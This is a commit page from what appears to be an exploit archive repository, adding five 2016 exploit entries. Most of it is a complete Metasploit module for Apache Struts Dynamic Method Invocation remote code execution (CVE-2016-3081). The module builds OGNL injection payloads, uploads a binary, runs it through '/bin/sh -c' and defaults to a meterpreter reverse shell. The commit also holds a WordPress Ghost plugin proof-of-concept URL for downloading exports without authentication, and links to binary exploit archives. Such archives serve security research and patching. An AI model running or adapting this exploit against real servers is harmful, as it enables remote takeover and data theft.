DB: 2016-05-03

5 new exploits WordPress Ghost Plugin 0.5.5 - Unrestricted Export Download .Net Framework Execute Native x86 Shellcode Acunetix WVS 10 - Remote Command Execution (System) Apache Struts Dynamic Method Invocation Remote Code Execution QSEE - PRDiag* Commands Privilege Escalation Exploit
liuelves · May 3, 2016 · 28f57d0 · 28f57d0
1 parent 7472667
commit 28f57d0
Show file tree

Hide file tree

Showing 6 changed files with 686 additions and 0 deletions.
diff --git a/files.csv b/files.csv
@@ -35964,3 +35964,8 @@ id,file,description,date,author,platform,type,port
 39749,platforms/multiple/dos/39749.txt,"Wireshark - alloc_address_wmem Assertion Failure",2016-04-29,"Google Security Research",multiple,dos,0
 39750,platforms/multiple/dos/39750.txt,"Wireshark - ett_zbee_zcl_pwr_prof_enphases Static Out-of-Bounds Read",2016-04-29,"Google Security Research",multiple,dos,0
 39751,platforms/php/webapps/39751.txt,"GLPi 0.90.2 - SQL Injection",2016-04-29,"High-Tech Bridge SA",php,webapps,80
+39752,platforms/php/webapps/39752.txt,"WordPress Ghost Plugin 0.5.5 - Unrestricted Export Download",2016-05-02,"Josh Brody",php,webapps,80
+39754,platforms/win32/shellcode/39754.txt,".Net Framework Execute Native x86 Shellcode",2016-05-02,Jacky5112,win32,shellcode,0
+39755,platforms/windows/remote/39755.py,"Acunetix WVS 10 - Remote Command Execution (System)",2016-05-02,"Daniele Linguaglossa",windows,remote,0
+39756,platforms/linux/remote/39756.rb,"Apache Struts Dynamic Method Invocation Remote Code Execution",2016-05-02,metasploit,linux,remote,8080
+39757,platforms/android/local/39757.txt,"QSEE - PRDiag* Commands Privilege Escalation Exploit",2016-05-02,laginimaineb,android,local,0
diff --git a/platforms/android/local/39757.txt b/platforms/android/local/39757.txt
@@ -0,0 +1,10 @@
+Sources:
+https://bits-please.blogspot.ca/2016/05/qsee-privilege-escalation-vulnerability.html
+https://github.com/laginimaineb/cve-2015-6639
+
+Qualcomm's Secure Execution Environment  (QSEE) Privilege Escalation Exploit using PRDiag* commands (CVE-2015-6639)
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39757.zip
+
diff --git a/platforms/linux/remote/39756.rb b/platforms/linux/remote/39756.rb
@@ -0,0 +1,190 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::EXE
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Apache Struts Dynamic Method Invocation Remote Code Execution',
+      'Description'    => %q{
+        This module exploits a remote command execution vulnerability in Apache Struts
+        version between 2.3.20 and 2.3.28 (except 2.3.20.2 and 2.3.24.2). Remote Code
+        Execution can be performed via method: prefix when Dynamic Method Invocation
+        is enabled.
+      },
+      'Author'         => [ 'Nixawk' ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          [ 'CVE', '2016-3081' ],
+          [ 'URL', 'https://www.seebug.org/vuldb/ssvid-91389' ]
+        ],
+      'Platform'       => %w{ linux },
+      'Privileged'     => true,
+      'DefaultOptions' => {
+        'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp_uuid'
+      },
+      'Targets'        =>
+        [
+          ['Linux Universal',
+            {
+              'Arch' => ARCH_X86,
+              'Platform' => 'linux'
+            }
+          ]
+        ],
+      'DisclosureDate' => 'Apr 27 2016',
+      'DefaultTarget' => 0))
+
+    register_options(
+      [
+        Opt::RPORT(8080),
+        OptString.new('TARGETURI', [ true, 'The path to a struts application action', '/blank-struts2/login.action']),
+        OptString.new('TMPPATH', [ false, 'Overwrite the temp path for the file upload. Needed if the home directory is not writable.', nil])
+      ], self.class)
+  end
+
+  def print_status(msg='')
+    super("#{peer} - #{msg}")
+  end
+
+  def send_http_request(payload)
+    uri = normalize_uri(datastore['TARGETURI'])
+    res = send_request_cgi(
+      'uri'     => "#{uri}#{payload}",
+      'method'  => 'POST')
+    if res && res.code == 404
+      fail_with(Failure::BadConfig, 'Server returned HTTP 404, please double check TARGETURI')
+    end
+    res
+  end
+
+  def parameterize(params) # params is a hash
+    URI.escape(params.collect { |k, v| "#{k}=#{v}" }.join('&'))
+  end
+
+  def generate_rce_payload(code, params_hash)
+    payload = "?method:"
+    payload << Rex::Text.uri_encode("#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS")
+    payload << ","
+    payload << Rex::Text.uri_encode(code)
+    payload << ","
+    payload << Rex::Text.uri_encode("1?#xx:#request.toString")
+    payload << "&"
+    payload << parameterize(params_hash)
+    payload
+  end
+
+  def temp_path
+    @TMPPATH ||= lambda {
+      path = datastore['TMPPATH']
+      return nil unless path
+      unless path.end_with?('/')
+        path << '/'
+      end
+      return path
+    }.call
+  end
+
+  def upload_file(filename, content)
+    var_a = rand_text_alpha_lower(4)
+    var_b = rand_text_alpha_lower(4)
+    var_c = rand_text_alpha_lower(4)
+    var_d = rand_text_alpha_lower(4)
+
+    code = "##{var_a}=new sun.misc.BASE64Decoder(),"
+    code << "##{var_b}=new java.io.FileOutputStream(new java.lang.String(##{var_a}.decodeBuffer(#parameters.#{var_c}[0]))),"
+    code << "##{var_b}.write(##{var_a}.decodeBuffer(#parameters.#{var_d}[0])),"
+    code << "##{var_b}.close()"
+
+    params_hash = { var_c => filename, var_d => content }
+    payload = generate_rce_payload(code, params_hash)
+
+    send_http_request(payload)
+  end
+
+  def execute_command(cmd)
+    var_a = rand_text_alpha_lower(4)
+    var_b = rand_text_alpha_lower(4)
+    var_c = rand_text_alpha_lower(4)
+    var_d = rand_text_alpha_lower(4)
+    var_e = rand_text_alpha_lower(4)
+    var_f = rand_text_alpha_lower(4)
+
+    code = "##{var_a}=@java.lang.Runtime@getRuntime().exec(#parameters.#{var_f}[0]).getInputStream(),"
+    code << "##{var_b}=new java.io.InputStreamReader(##{var_a}),"
+    code << "##{var_c}=new java.io.BufferedReader(##{var_b}),"
+    code << "##{var_d}=new char[1024],"
+    code << "##{var_c}.read(##{var_d}),"
+
+    code << "##{var_e}=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),"
+    code << "##{var_e}.println(##{var_d}),"
+    code << "##{var_e}.close()"
+
+    cmd.tr!(' ', '+') if cmd && cmd.include?(' ')
+    params_hash = { var_f => cmd }
+    payload = generate_rce_payload(code, params_hash)
+
+    send_http_request(payload)
+  end
+
+  def linux_stager
+    payload_exe = rand_text_alphanumeric(4 + rand(4))
+    path = temp_path || '/tmp/'
+    payload_exe = "#{path}#{payload_exe}"
+
+    b64_filename = Rex::Text.encode_base64(payload_exe)
+    b64_content = Rex::Text.encode_base64(generate_payload_exe)
+
+    print_status("Uploading exploit to #{payload_exe}")
+    upload_file(b64_filename, b64_content)
+
+    print_status("Attempting to execute the payload...")
+    execute_command("chmod 700 #{payload_exe}")
+    execute_command("/bin/sh -c #{payload_exe}")
+  end
+
+  def exploit
+    linux_stager
+  end
+
+  def check
+    var_a = rand_text_alpha_lower(4)
+    var_b = rand_text_alpha_lower(4)
+
+    addend_one = rand_text_numeric(rand(3) + 1).to_i
+    addend_two = rand_text_numeric(rand(3) + 1).to_i
+    sum = addend_one + addend_two
+    flag = Rex::Text.rand_text_alpha(5)
+
+    code = "##{var_a}=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),"
+    code << "##{var_a}.print(#parameters.#{var_b}[0]),"
+    code << "##{var_a}.print(new java.lang.Integer(#{addend_one}+#{addend_two})),"
+    code << "##{var_a}.print(#parameters.#{var_b}[0]),"
+    code << "##{var_a}.close()"
+
+    params_hash = { var_b => flag }
+    payload = generate_rce_payload(code, params_hash)
+
+    begin
+      resp = send_http_request(payload)
+    rescue Msf::Exploit::Failed
+      return Exploit::CheckCode::Unknown
+    end
+
+    if resp && resp.code == 200 && resp.body.include?("#{flag}#{sum}#{flag}")
+      Exploit::CheckCode::Vulnerable
+    else
+      Exploit::CheckCode::Safe
+    end
+  end
+
+end
diff --git a/platforms/php/webapps/39752.txt b/platforms/php/webapps/39752.txt
@@ -0,0 +1,23 @@
+# Exploit Title: WordPress Export to Ghost Unrestricted Export Download
+# Date: 28-04-2016
+# Software Link: https://wordpress.org/plugins/ghost
+# Exploit Author: Josh Brody
+# Contact: http://twitter.com/joshmn
+# Website: http://josh.mn/
+# Category: webapps
+
+1. Description
+
+Any visitor can download the Ghost Export file because of a failure to check if an admin user is properly authenticated. Assume all versions < 0.5.6 are vulnerable.
+
+2. Proof of Concept
+
+http://example.com/wp-admin/tools.php?ghostexport=true&submit=Download+Ghost+file
+
+File will be downloaded.
+
+3. Solution:
+
+Update to version 0.5.6
+
+https://downloads.wordpress.org/plugin/ghost.0.5.6.zip
diff --git a/platforms/win32/shellcode/39754.txt b/platforms/win32/shellcode/39754.txt
@@ -0,0 +1,10 @@
+# Exploit Title: .Net framework execute native x86 shellcode
+# Date: May. 2nd 2016
+# Exploit Author: Jacky5112 
+# Software Link: https://github.com/jacky5112/ShellCodeTest_Version_1.0
+# Version: 1.0
+# Tested on: Windows
+# CVE : (none)
+
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39754.zip
+